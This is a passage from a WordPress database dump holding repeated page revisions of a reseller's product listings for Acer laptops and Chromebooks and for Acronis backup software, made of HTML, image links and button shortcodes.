src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">TravelMate B</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>TravelMate Spin B1</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n<h4 class=\"fs-4 align-center margin-top-l\">TravelMate P</h4>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:22:14','2019-09-18 06:22:14','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3133,1,'2019-09-18 14:23:20','2019-09-18 06:23:20','<h1>Business Product Solution</h1>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Swift</h3>\r\n<img class=\"alignnone wp-image-2306 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Swift_7_Ale_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Swift 7 Pro</b></strong>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Ultra-thin, stylish and all the power to satisfy your mobile needs.</p>\r\n[maxbutton id=\"7\" ]\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Spin</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Revolutionary convertible computers that feature powerful innovation and forward-thinking design.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr align=\"center\">\r\n<td width=\"200\"><img class=\"alignnone wp-image-2307 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Spin-1-SP111-34N-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 1</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2308 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/acer-spin-3-SP314-52-gray-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 3</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-2309 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Spin-5-SP515_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n<p style=\"text-align: center;\">Spin 5 Pro</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">Switch</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Perfect blend of a laptop and tablet with modes to fit into every situation.</p>\r\n<img class=\"alignnone wp-image-2310 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_Switch_Alpha_12_SA5-271-preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>Switch 12</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3 class=\"fs-4 align-center margin-top-l\">Acer Chromebook</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Starts in seconds, thousands of apps, built-in virus protection and all your data saves in the cloud.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2311\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Chromebook-Tab-10-D651N-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chrome Tab 10</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2312\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-R-13_preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R13</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2313\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook_14-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2314\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer_CP5-471_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 14 for Work</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2315\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/C730-nontouch-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">Acer Chromebook 11 C730</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2316\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/AcerChromebookR11_C738T_black-sku-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">Acer Chromebook R 11 C738T</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2317 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Chromebook-11-N7_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" /></p>\r\n<p style=\"text-align: center;\">Acer Chromebook 11 N7</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3 class=\"fs-4 align-center margin-top-l\">TravelMate B</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Portable laptops that look great and are great for productivity.</p>\r\n<img class=\"alignnone wp-image-2319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TM-Spin-B118_preview-300x222.png\" alt=\"\" width=\"300\" height=\"222\" />\r\n\r\n<strong><b>TravelMate Spin B1</b></strong>\r\n\r\n[maxbutton id=\"7\" ]\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3 class=\"fs-4 align-center margin-top-l\">TravelMate P</h3>\r\n<p class=\"fs-2 align-center text-tertiary-dark margin-bottom-m\">Full-featured business laptops that deliver superior performance, manageability and security features.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P246M-sku-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P2</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2321\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TMP4-product-series-preview.png\" alt=\"\" width=\"474\" height=\"351\" />\r\n<p style=\"text-align: center;\">TravelMate P4</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-2322\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/TravelMate-P658-preview.png\" alt=\"\" width=\"338\" height=\"250\" />\r\n<p style=\"text-align: center;\">TravelMate P6</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"7\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Acer','','inherit','closed','closed','','1430-revision-v1','','','2019-09-18 14:23:20','2019-09-18 06:23:20','',1430,'https://bintara.com.my/blog/2019/09/18/1430-revision-v1/',0,'revision','',0),(3136,1,'2019-09-18 14:26:59','2019-09-18 06:26:59','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:26:59','2019-09-18 06:26:59','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3134,1,'2019-09-18 14:26:22','2019-09-18 06:26:22','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:26:22','2019-09-18 06:26:22','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3135,1,'2019-09-18 14:26:36','2019-09-18 06:26:36','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:26:36','2019-09-18 06:26:36','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3137,1,'2019-09-18 14:27:25','2019-09-18 06:27:25','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h2>Every Acronis backup solution delivers</h2>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:27:25','2019-09-18 06:27:25','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3138,1,'2019-09-18 14:27:46','2019-09-18 06:27:46','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:27:46','2019-09-18 06:27:46','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3140,1,'2019-09-18 14:28:51','2019-09-18 06:28:51','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:28:51','2019-09-18 06:28:51','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3139,1,'2019-09-18 14:28:12','2019-09-18 06:28:12','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:28:12','2019-09-18 06:28:12','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3141,1,'2019-09-18 14:30:08','2019-09-18 06:30:08','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:30:08','2019-09-18 06:30:08','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3145,1,'2019-09-18 14:33:42','2019-09-18 06:33:42','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:33:42','2019-09-18 06:33:42','',1435,'https://bintara.com.my/blog/2019/09/18/1435-revision-v1/',0,'revision','',0),(3142,1,'2019-09-18 14:31:26','2019-09-18 06:31:26','<h1>Acronis Backup Software for Business</h1>\r\n\r\n&nbsp;\r\n\r\n<h3>Every Acronis backup solution delivers</h3>\r\n\r\n&nbsp;\r\n\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\" style=\"border-style: dotted;\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n\r\n&nbsp;\r\n&nbsp;\r\n\r\n<div style=\"text-align: center;\">[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2019-09-18 14:31:26','2019-09-18 